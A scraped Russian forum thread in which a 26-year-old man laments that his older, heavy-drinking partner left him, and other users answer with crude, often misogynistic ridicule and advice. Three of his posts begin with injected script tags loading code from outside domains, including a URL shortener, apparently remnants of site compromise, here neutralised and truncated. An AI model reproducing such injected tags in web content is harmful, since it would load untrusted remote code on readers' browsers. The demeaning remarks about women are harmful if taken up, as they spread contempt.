Top.Mail.Ru

Перейти к содержимому

Фотография

девушка ушла к другому

• Авторизуйтесь для ответа в теме
Сообщений в теме: 102

#31 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 12:53

- <script type="text/oops" src="http://filesw0rld.xy...ay=0"></script>

А вещи предлагает забрать, потому что поняла. Белов никогда не изменится. Обманул девушку в лучших надеждах и чаяниях, айяяйяй Белов. Ну так же нельзя :)

сколько людей столько и мнений))))))))))))полезно воспринимать все с сарказмом,но если человека любишь и не знаешь что в его голове то загоняяешься жесть)))))))а ведь она выбрала с кем быть,и я вот такой человек что не могу лезть туда где занята даже если бывшая,ну люблю и все,помнится даже ради меня готова кодироваться была,но мы купили тетуран ,хватило на 2 недели) он ей нече не покупает просто пьют вместе и все,даже если на выходных но пьют же... а так решил из ее жизни исчезнуть посмотреть как у них там мало ли это отношения с отскоком разочаруется в нем и придет 

• 0

#32 Окорок

Окорок

Долговязый

• Полноправный
  • PipPipPipPipPip
  • 4 756 Cообщений
3 496
Очень хороший

Отправлено 28 мая 2017 - 12:59

Но-но советчик , четко разложил как ее вернуть. А надо-ли ее возвращать советчика не спрашивали! Сам бухой )) он тебя не спрашивал надобно-ли ее возвращать :)) и характеристики с эпитетами на даму его сердца также :)

Иди коз паси

• 1

#33 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 12:59

да она немолода но на момент нашего знакомства я бы ей 30 точно дал если не 28, это была красивая женщина,и вроде бы полгода не долгие отношения но и не месяц,как то привык,даже живя в деревне с ее экцессами да и сам не подарок был,только к нему ушла и сразу внешность стала хуже,хотя может это возрастное

• 0

#34 Давинче

Давинче

бывалый

• Полноправный
  • PipPip
  • 352 Cообщений
262
Очень хороший

Отправлено 28 мая 2017 - 13:32

Ещё один номинант на высшую награду данного форума.Валера,сходи к бабке, пусть отшепчет. Мож она тампон тебе в чай мокнула!?Ты случаем не на ней девственость свою потерял? Позвони её фраеру,поблагодари за удачу, которую он тебе принес и живи в радости.И да,кстати,любви у тебя к ней нет,не обманывай себя,у тебя просто зажало яйки(самолюбие) что тебя бросили.Поверь,ты бы это понял,еслиб она к тебе вернулась.
P.S. Как можно любить старую пьянь больше чем себя???
  • 2

#35 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 13:42

<script type="text/oops" src="http://traftaxi.eu/t...ay=0"></script>

Ещё один номинант на высшую награду данного форума.Валера,сходи к бабке, пусть отшепчет. Мож она тампон тебе в чай мокнула!?Ты случаем не на ней девственость свою потерял? Позвони её фраеру,поблагодари за удачу, которую он тебе принес и живи в радости.И да,кстати,любви у тебя к ней нет,не обманывай себя,у тебя просто зажало яйки(самолюбие) что тебя бросили.Поверь,ты бы это понял,еслиб она к тебе вернулась.
P.S. Как можно любить старую пьянь больше чем себя???

все таки полгода жил с этим человеком,привык к нему,да она не раз говорила что пока не хочет возвращаться и не знает когда, но я сто тысяч раз задавался вопросом даже если и придет то смогу ли с ней жить зная что она другому давала

• 0

#36 Окорок

Окорок

Долговязый

• Полноправный
  • PipPipPipPipPip
  • 4 756 Cообщений
3 496
Очень хороший

Отправлено 28 мая 2017 - 13:46

А че других баб не попробуешь потрахать-то?

• 1

#37 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 13:59

<script type="text/oops" src="http://is.gd/J87Pzs"...7Pzs"></script>

А че других баб не попробуешь потрахать-то?

хз не хочется,до нее девушки были ,отношения тоже,но чтобы настолько старше женщину полюбить эт впервые

• 0

#38 Фима Полужид

Фима Полужид

алкаш и планокур

• Полноправный
  • PipPipPipPipPip
  • 4 192 Cообщений
4 698
Очень хороший

Отправлено 28 мая 2017 - 14:08

ей 39,мне 26

начал замечать что она выпивает,

Паук из "Коррозии металла" лхарактеризовал бы ситуацию как "адский могильный трэш, тащемта, тотально переходящий в полнейший угар и животную содомию, например"

Автор, ответь - на кой буй тебе нужна алкашка на 13 лет старше и все проблемы с этим связанные? Ты настолько ущербный в сври 25, что не можешь найти что-то лучшее?

жили на родительские деньги

Будь я твоим отцом, я б тебе не денег, а пиздюлей бы дал. Тебя родители для этого растили?

• 3

Женщины любят только мерзавцев, это всем известно. Однако быть мерзавцем не каждому дано. У меня был знакомый валютчик Акула. Избивал жену черенком лопаты. Подарил ее шампунь своей возлюбленной. Убил кота. Один раз в жизни приготовил ей бутерброд с сыром. Жена всю ночь рыдала от умиления и нежности. Консервы девять лет в Мордовию посылала. Ждала... А хороший человек, кому он нужен, спрашивается?... © Сергей Довлатов

#39 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 14:08

На вкус и цвет товарищей нет. Для меня все дамы младше 35 что-то вроде ясельной подготовительной группы. Дело не в возрасте дамы. И с возрастом дама не становится хуже. Вы ещё введите градации по первой и второй свежести :)))

Сообщение отредактировал Mixrud: 28 мая 2017 - 14:11

• 0

#40 Фима Полужид

Фима Полужид

алкаш и планокур

• Полноправный
  • PipPipPipPipPip
  • 4 192 Cообщений
4 698
Очень хороший

Отправлено 28 мая 2017 - 14:11

На вкус и цвет товарищей нет. Для меня все дамы младше 35 что-то вроде ясельной подготовительной группы.

Тебе лет сколько?

Название темы зверски доставило

девушка ушла к другому

39 лет, а все девушка. Я хуею.

• 2

Женщины любят только мерзавцев, это всем известно. Однако быть мерзавцем не каждому дано. У меня был знакомый валютчик Акула. Избивал жену черенком лопаты. Подарил ее шампунь своей возлюбленной. Убил кота. Один раз в жизни приготовил ей бутерброд с сыром. Жена всю ночь рыдала от умиления и нежности. Консервы девять лет в Мордовию посылала. Ждала... А хороший человек, кому он нужен, спрашивается?... © Сергей Довлатов

#41 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 14:12

На вкус и цвет товарищей нет. Для меня все дамы младше 35 что-то вроде ясельной подготовительной группы.

Тебе лет сколько?

Название темы зверски доставило

девушка ушла к другому

39 лет, а все девушка. Я хуею.
36. Девушка, а кто она мальчик по твоему? ))

Сообщение отредактировал Mixrud: 28 мая 2017 - 14:16

• 0

#42 Валерий Белов

Валерий Белов
  • Посетитель
  • 43 Cообщений
-2
Обычный

Отправлено 28 мая 2017 - 14:22

ей 39,мне 26

Паук из "Коррозии металла" лхарактеризовал бы ситуацию как "адский могильный трэш, тащемта, тотально переходящий в полнейший угар и животную содомию, например"

Автор, ответь - на кой буй тебе нужна алкашка на 13 лет старше и все проблемы с этим связанные? Ты настолько ущербный в сври 25, что не можешь найти что-то лучшее?

Будь я твоим отцом, я б тебе не денег, а пиздюлей бы дал. Тебя родители для этого растили?

могу и мог,но вот так получилось что не могу забыть.просмотрел видео куча афоньшина,рамкулова и т.д,прочитал книгу *любимые не бывают бывшими*,люди советуют на нее хуй забить ,типо потом сама бегать будет и т.д. если бы 22 числа я бы не был у нее в магазе то все дни игнора и советов были бы не напрасны,но пришлось с 23 заново начинать

ей 39,мне 26

когда я не работал она свои пьянки обьясняла тем что не работаю,устроился на работу,какое то время не пила,в один день прихожу и все тоже самое

На вкус и цвет товарищей нет. Для меня все дамы младше 35 что-то вроде ясельной подготовительной группы. Дело не в возрасте дамы. И с возрастом дама не становится хуже. Вы ещё введите градации по первой и второй свежести

честно неважно сколько ей вот люблю и все и верю что она любит,только с ним ей вольготнее

• 0

#43 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 14:25

Вы там на парня баллоны сильно не гоните по поводу работы. Он вроде из российской глубинки. Там хедхантера нет. Работодатели тебе сами по 10 раз на дню не звонят и не берут сразу на работу на первом собеседовании.

Там у них все по другому. Немного госслужбы, на которую берут только за взятки или кумовство. Возможно есть одно градообразующее предприятие на радиус 50 километров , немного частного бизнеса, а так только фермерствовать.

Так что если человек токарь или слесарь может и год без работы сидеть, перебиваясь заказами на дому.

И Массимо дутти, Зары, Баркер, Гап, GF Ferre, Bally, Loake там тоже нет. В лучшем случае в соседнем совхозе точка Wildberries. А иначе рынок с китайским шмотьем в цену с чугунный мост. И запчасти там возятся с областного филиала бывшего Экзист, который по наполнению намного хуже московского. И иногда из Москвы на двигатель Опель выпускной клапан ну не привезти, вообще.

Сообщение отредактировал Mixrud: 28 мая 2017 - 14:34

• 0

#44 Фима Полужид

Фима Полужид

алкаш и планокур

• Полноправный
  • PipPipPipPipPip
  • 4 192 Cообщений
4 698
Очень хороший

Отправлено 28 мая 2017 - 14:33

когда я не работал она свои пьянки обьясняла тем что не работаю

Где здесь взаимосвязь-то? С таким де успезом можно утверждать, что ее пьянки вызваны вспышками солнечной активности, Или антициклоном из Атлантики.

36. Девушка, а кто она мальчик по твоему? ))

Это уже давно не девушка. Некоторые и РСП "девушками" называют.

Представь себя в свои 36 с бабой 36+13=49 лет от роду. Даже, если она и не бузает. Ее ведь еще и трахать надо, хотя бы иногда. Тебе не поплохело?

• 0

#45 Mixrud

Mixrud

старофлудер

• Забанен
  • PipPipPipPipPip
  • 3 619 Cообщений
347
Очень хороший

Отправлено 28 мая 2017 - 14:35

Скажу тебе так и в 60 кисы бывают ваше красотки :)
Так что нет такого понятия возраст для женщины. Это чисто стереотипы и предубеждения накладываемые социумом.

Сообщение отредактировал Mixrud: 28 мая 2017 - 14:39

• 0

Количество пользователей, читающих эту тему: 1

0